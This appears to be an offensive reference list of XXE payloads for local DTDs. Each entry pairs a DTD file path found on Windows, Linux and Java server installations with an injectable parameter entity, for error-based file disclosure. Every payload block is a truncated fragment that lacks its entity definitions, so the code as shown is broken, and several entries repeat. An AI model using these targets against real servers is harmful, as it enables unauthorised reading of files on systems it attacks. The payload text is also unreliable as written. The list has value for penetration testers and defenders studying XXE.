# XXE payloads for specific DTDs

**DTD File:** `/C:\Windows\System32\wbem\xml\cim20.dtd`

**Injectable entity:** `%CIMName`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/C:\Windows\System32\wbem\xml\wmi20.dtd`

**Injectable entity:** `%CIMName`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/C:\Program Files (x86)\Lotus\Notes\domino.dtd`

**Injectable entity:** `%boolean`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/C:\Windows\System32\xwizard.dtd`

**Injectable entity:** `%onerrortypes`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/yelp/dtd/docbookx.dtd`

**Injectable entity:** `%ISOamsa`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd`

**Injectable entity:** `%URI`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd`

**Injectable entity:** `%Boolean`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd`

**Injectable entity:** `%url.attribute.set`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd`

**Injectable entity:** `%condition`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/xml/fontconfig/fonts.dtd`

**Injectable entity:** `%constant`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/struts/struts-config_1_1.dtd`

**Injectable entity:** `%AttributeName`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd`

**Injectable entity:** `%AttributeName`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/gtksourceview-4/language-specs/language.dtd`

**Injectable entity:** `%itemattrs`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd`

**Injectable entity:** `%n.InProceedings`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/boostbook/dtd/boostbook.dtd`

**Injectable entity:** `%boost.common.attrib`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd`

**Injectable entity:** `%queries`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd`

**Injectable entity:** `%publicIdentifier`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/nmap/nmap.dtd`

**Injectable entity:** `%attr_numeric`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/liteide/liteeditor/kate/language.dtd`

**Injectable entity:** `%commonAttributes`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/libgweather/locations.dtd`

**Injectable entity:** `%name`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/libgda-5.0/dtd/libgda-server-operation.dtd`

**Injectable entity:** `%paramlist-dtd`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/share/libgda-5.0/dtd/libgda-paramlist.dtd`

**Injectable entity:** `%array-dtd`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/share/xml/docutils/docutils.dtd`

**Injectable entity:** `%measure`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/dblatex/schema/dblatex-config.dtd`

**Injectable entity:** `%attlist.modname`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd`

**Injectable entity:** `%common`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd`

**Injectable entity:** `%xs-datatypes`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/share/sgml/dtd/xml-core/catalog.dtd`

**Injectable entity:** `publicIdentifier`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/xml/schema/xml-core/catalog.dtd`

**Injectable entity:** `partialPublicIdentifier`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/etc/vmware-tools/vgauth/schemas/XMLSchema.dtd`

**Injectable entity:** `xs-datatypes`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/perfsuite/dtds/pshwpc/hwpcprofilereport-0.2.dtd`
- `/usr/share/perfsuite/dtds/pshwpc/hwpcprofilereport-0.3.dtd`
- `/usr/share/perfsuite/dtds/pshwpc/hwpcprofilereport.dtd`
- `/usr/share/perfsuite/dtds/pshwpc/hwpcreport-0.3.dtd`
- `/usr/share/perfsuite/dtds/pshwpc/hwpcreport.dtd`

**Injectable entity:** `machineinfo.dtd`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/perfsuite/dtds/pshwpc/multihwpcprofilereport-0.2.dtd`
- `/usr/share/perfsuite/dtds/pshwpc/multihwpcprofilereport-0.3.dtd`

**Injectable entity:** `hwpcprofilereport.dtd`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/perfsuite/dtds/pshwpc/multihwpcreport-0.3.dtd`
- `/usr/share/perfsuite/dtds/pshwpc/multihwpcreport.dtd`

**Injectable entity:** `hwpcreport.dtd`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/share/perfsuite/dtds/pshwpc/psmetrics.dtd`

**Injectable entity:** `expr`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/lib/libreoffice/share/dtd/officedocument/1_0/accelerator.dtd`

**Injectable entity:** `boolean`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/paros/xml/alert.dtd`
- `/usr/share/zaproxy/xml/alert.dtd`

**Injectable entity:** `alertDef`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd`

**Injectable entity:** `n.InProceedings`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/boostbook/dtd/1.1/boostbook.dtd`
- `/usr/share/boostbook/dtd/boostbook.dtd`

**Injectable entity:** `boost.common.attrib`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:** `/usr/share/doc/libxml-libxml-perl/examples/complex/complex.dtd`

**Injectable entity:** `f`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:** `/usr/share/doc/libxml-libxml-perl/examples/complex/dtd/f.dtd`

**Injectable entity:** `g`

**XXE Payload:**

```
"> %eval; %error; '> %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/xml/docbook/stylesheet/docbook-xsl/common/l10n.dtd`
- `/usr/share/xml/docbook/xsl-stylesheets-1.79.2/common/l10n.dtd`
- `/usr/share/xml/docbook/xsl-stylesheets-1.79.2-nons/common/l10n.dtd`

**Injectable entity:** `xmlns`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```

---

**DTD File:**

- `/usr/share/gtksourceview-2.0/language-specs/language.dtd`
- `/usr/share/gtksourceview-3.0/language-specs/language.dtd`
- `/usr/share/gtksourceview-4/language-specs/language.dtd`

**Injectable entity:** `commonAttributes`

**XXE Payload:**

```
"> %eval; %error; %local_dtd; ]>
```